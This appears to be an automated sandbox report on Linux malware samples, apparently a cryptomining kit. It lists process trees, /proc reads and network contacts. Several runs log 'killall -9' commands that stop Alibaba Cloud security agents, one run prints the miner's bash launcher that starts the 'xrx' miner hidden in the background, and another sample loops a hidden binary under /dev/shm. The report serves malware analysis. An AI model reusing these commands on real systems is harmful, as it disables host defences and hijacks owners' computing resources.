File opened for reading /proc/280/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/296/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/451/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/264/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/135/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:54

Platform

ubuntu2004-amd64-20240729-en

Max time kernel

0s

Max time network

180s

Command Line

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/13/stat /usr/bin/pidof N/A
File opened for reading /proc/105/cmdline /usr/bin/pidof N/A
File opened for reading /proc/617/cmdline /usr/bin/pidof N/A
File opened for reading /proc/633/stat /usr/bin/pidof N/A
File opened for reading /proc/922/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1088/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1110/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1145/stat /usr/bin/pidof N/A
File opened for reading /proc/1338/cmdline /usr/bin/pidof N/A
File opened for reading /proc/6/cmdline /usr/bin/pidof N/A
File opened for reading /proc/167/cmdline /usr/bin/pidof N/A
File opened for reading /proc/452/cmdline /usr/bin/pidof N/A
File opened for reading /proc/453/cmdline /usr/bin/pidof N/A
File opened for reading /proc/519/stat /usr/bin/pidof N/A
File opened for reading /proc/537/cmdline /usr/bin/pidof N/A
File opened for reading /proc/579/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1001/stat /usr/bin/pidof N/A
File opened for reading /proc/1094/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1206/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1361/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1397/stat /usr/bin/pidof N/A
File opened for reading /proc/85/stat /usr/bin/pidof N/A
File opened for reading /proc/140/cmdline /usr/bin/pidof N/A
File opened for reading /proc/990/stat /usr/bin/pidof N/A
File opened for reading /proc/1103/cmdline /usr/bin/pidof N/A
File opened for reading /proc/75/cmdline /usr/bin/pidof N/A
File opened for reading /proc/454/cmdline /usr/bin/pidof N/A
File opened for reading /proc/498/cmdline /usr/bin/pidof N/A
File opened for reading /proc/575/cmdline /usr/bin/pidof N/A
File opened for reading /proc/668/stat /usr/bin/pidof N/A
File opened for reading /proc/1001/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1079/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1312/stat /usr/bin/pidof N/A
File opened for reading /proc/1347/cmdline /usr/bin/pidof N/A
File opened for reading /proc/162/stat /usr/bin/pidof N/A
File opened for reading /proc/673/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1347/stat /usr/bin/pidof N/A
File opened for reading /proc/23/stat /usr/bin/pidof N/A
File opened for reading /proc/200/stat /usr/bin/pidof N/A
File opened for reading /proc/454/stat /usr/bin/pidof N/A
File opened for reading /proc/1340/stat /usr/bin/pidof N/A
File opened for reading /proc/1346/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1361/stat /usr/bin/pidof N/A
File opened for reading /proc/1065/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1404/stat /usr/bin/pidof N/A
File opened for reading /proc/3/cmdline /usr/bin/pidof N/A
File opened for reading /proc/13/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/cmdline /usr/bin/pidof N/A
File opened for reading /proc/270/stat /usr/bin/pidof N/A
File opened for reading /proc/694/stat /usr/bin/pidof N/A
File opened for reading /proc/803/cmdline /usr/bin/pidof N/A
File opened for reading /proc/858/cmdline /usr/bin/pidof N/A
File opened for reading /proc/71/cmdline /usr/bin/pidof N/A
File opened for reading /proc/441/cmdline /usr/bin/pidof N/A
File opened for reading /proc/632/stat /usr/bin/pidof N/A
File opened for reading /proc/668/cmdline /usr/bin/pidof N/A
File opened for reading /proc/779/stat /usr/bin/pidof N/A
File opened for reading /proc/5/stat /usr/bin/pidof N/A
File opened for reading /proc/11/stat /usr/bin/pidof N/A
File opened for reading /proc/242/cmdline /usr/bin/pidof N/A
File opened for reading /proc/615/cmdline /usr/bin/pidof N/A
File opened for reading /proc/22/stat /usr/bin/pidof N/A
File opened for reading /proc/168/cmdline /usr/bin/pidof N/A
File opened for reading /proc/171/cmdline /usr/bin/pidof N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/xrx/init.sh N/A
N/A N/A /bin/bash N/A
N/A N/A /tmp/xrx/init.sh N/A
N/A N/A /bin/bash N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/bin/bash

[/tmp/xrx/init.sh -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.96:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240418-en

Max time kernel

140s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240226-en

Max time kernel

22s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/683/stat /usr/bin/killall N/A
File opened for reading /proc/644/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/144/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/363/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/392/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/644/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/390/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/366/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/234/stat /usr/bin/killall N/A
File opened for reading /proc/144/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/730/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/688/cmdline /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/114/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/234/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/392/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

140s

Max time network

131s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.39:443 tcp
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1193/stat /usr/bin/killall N/A
File opened for reading /proc/1066/stat /usr/bin/killall N/A
File opened for reading /proc/460/stat /usr/bin/killall N/A
File opened for reading /proc/1122/cmdline /usr/bin/killall N/A
File opened for reading /proc/1148/stat /usr/bin/killall N/A
File opened for reading /proc/674/cmdline /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/965/stat /usr/bin/killall N/A
File opened for reading /proc/1130/stat /usr/bin/killall N/A
File opened for reading /proc/1171/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/552/stat /usr/bin/killall N/A
File opened for reading /proc/173/stat /usr/bin/killall N/A
File opened for reading /proc/962/stat /usr/bin/killall N/A
File opened for reading /proc/1197/stat /usr/bin/killall N/A
File opened for reading /proc/650/stat /usr/bin/killall N/A
File opened for reading /proc/1331/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/1130/cmdline /usr/bin/killall N/A
File opened for reading /proc/1189/cmdline /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/169/stat /usr/bin/killall N/A
File opened for reading /proc/1114/cmdline /usr/bin/killall N/A
File opened for reading /proc/1062/stat /usr/bin/killall N/A
File opened for reading /proc/1014/stat /usr/bin/killall N/A
File opened for reading /proc/1193/stat /usr/bin/killall N/A
File opened for reading /proc/1014/stat /usr/bin/killall N/A
File opened for reading /proc/647/stat /usr/bin/killall N/A
File opened for reading /proc/1548/stat /usr/bin/killall N/A
File opened for reading /proc/1134/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/1072/stat /usr/bin/killall N/A
File opened for reading /proc/1189/stat /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/955/stat /usr/bin/killall N/A
File opened for reading /proc/1331/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/552/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/1043/stat /usr/bin/killall N/A
File opened for reading /proc/560/stat /usr/bin/killall N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/248/stat /usr/bin/killall N/A
File opened for reading /proc/1076/cmdline /usr/bin/killall N/A
File opened for reading /proc/1154/stat /usr/bin/killall N/A
File opened for reading /proc/462/stat /usr/bin/killall N/A
File opened for reading /proc/1076/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/1134/cmdline /usr/bin/killall N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/1043/stat /usr/bin/killall N/A
File opened for reading /proc/674/cmdline /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/732/stat /usr/bin/killall N/A
File opened for reading /proc/1090/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/83/stat /usr/bin/killall N/A
File opened for reading /proc/1262/stat /usr/bin/killall N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/1275/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/744/cmdline /usr/bin/killall N/A
File opened for reading /proc/1092/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/1143/cmdline /usr/bin/killall N/A
File opened for reading /proc/1151/stat /usr/bin/killall N/A
File opened for reading /proc/1204/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/1092/cmdline /usr/bin/killall N/A
File opened for reading /proc/1055/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/175/stat /usr/bin/killall N/A
File opened for reading /proc/501/stat /usr/bin/killall N/A
File opened for reading /proc/1513/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/1212/stat /usr/bin/killall N/A
File opened for reading /proc/1279/cmdline /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/1358/stat /usr/bin/killall N/A
File opened for reading /proc/1517/stat /usr/bin/killall N/A
File opened for reading /proc/180/stat /usr/bin/killall N/A
File opened for reading /proc/1520/stat /usr/bin/killall N/A
File opened for reading /proc/471/stat /usr/bin/killall N/A
File opened for reading /proc/170/stat /usr/bin/killall N/A
File opened for reading /proc/734/stat /usr/bin/killall N/A
File opened for reading /proc/1125/stat /usr/bin/killall N/A
File opened for reading /proc/1331/cmdline /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/1102/stat /usr/bin/killall N/A
File opened for reading /proc/206/cmdline /usr/bin/killall N/A
File opened for reading /proc/1518/stat /usr/bin/killall N/A
File opened for reading /proc/1520/stat /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
File opened for reading /proc/1151/cmdline /usr/bin/killall N/A
File opened for reading /proc/34/stat /usr/bin/killall N/A
File opened for reading /proc/1155/stat /usr/bin/killall N/A
File opened for reading /proc/432/stat /usr/bin/killall N/A
File opened for reading /proc/535/stat /usr/bin/killall N/A
File opened for reading /proc/1334/cmdline /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/15/cmdline /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
File opened for reading /proc/205/stat /usr/bin/killall N/A
File opened for reading /proc/535/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/689/stat /usr/bin/killall N/A
File opened for reading /proc/1187/stat /usr/bin/killall N/A
File opened for reading /proc/31/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /usr/bin/killall N/A
File opened for reading /proc/734/stat /usr/bin/killall N/A
File opened for reading /proc/1280/stat /usr/bin/killall N/A
File opened for reading /proc/440/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/239/cmdline /usr/bin/killall N/A
File opened for reading /proc/180/stat /usr/bin/killall N/A
File opened for reading /proc/1520/cmdline /usr/bin/killall N/A
File opened for reading /proc/1147/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/154/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/692/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/374/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/692/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
